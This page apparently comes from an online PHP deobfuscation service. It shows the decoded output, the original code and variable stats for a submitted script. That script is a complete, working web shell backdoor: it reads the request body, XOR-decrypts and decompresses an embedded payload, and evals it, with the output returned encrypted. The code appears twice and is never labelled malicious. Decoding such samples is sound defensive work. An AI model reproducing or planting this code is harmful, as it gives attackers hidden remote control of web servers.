Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $k="0cc175b9";$kh="c0f1b6a831c3";$kf="99e269772661";$p="u6I9amt9s3oSUb7Z"; funct..

Decoded Output download

<?php 
$k="0cc175b9";$kh="c0f1b6a831c3";$kf="99e269772661";$p="u6I9amt9s3oSUb7Z"; 
 
function x($t,$k){ 
$c=strlen($k);$l=strlen($t);$o=""; 
for($i=0;$i<$l;){ 
for($j=0;($j<$c&&$i<$l);$j++,$i++) 
{ 
$o.=$t[$i]^$k[$j]; 
} 
} 
return $o; 
} 
if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) { 
@ob_start(); 
@eval(@gzuncompress(@x(@base64_decode($m[1]),$k))); 
$o=@ob_get_contents(); 
@ob_end_clean(); 
$r=@base64_encode(@x(@gzcompress($o),$k)); 
print("$p$kh$r$kf"); 
} 
 
 
?>

Did this file decode correctly?

Original Code

<?php
$k="0cc175b9";$kh="c0f1b6a831c3";$kf="99e269772661";$p="u6I9amt9s3oSUb7Z";

function x($t,$k){
$c=strlen($k);$l=strlen($t);$o="";
for($i=0;$i<$l;){
for($j=0;($j<$c&&$i<$l);$j++,$i++)
{
$o.=$t[$i]^$k[$j];
}
}
return $o;
}
if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {
@ob_start();
@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
$o=@ob_get_contents();
@ob_end_clean();
$r=@base64_encode(@x(@gzcompress($o),$k));
print("$p$kh$r$kf");
}


?>

Function Calls

preg_match 1
file_get_contents 1

Variables

$k 0cc175b9
$p u6I9amt9s3oSUb7Z
$kf 99e269772661
$kh c0f1b6a831c3

Stats

MD5 ed4f46a94a74ba9f3edef0f43f4c4830
Eval Count 0
Decode Time 102 ms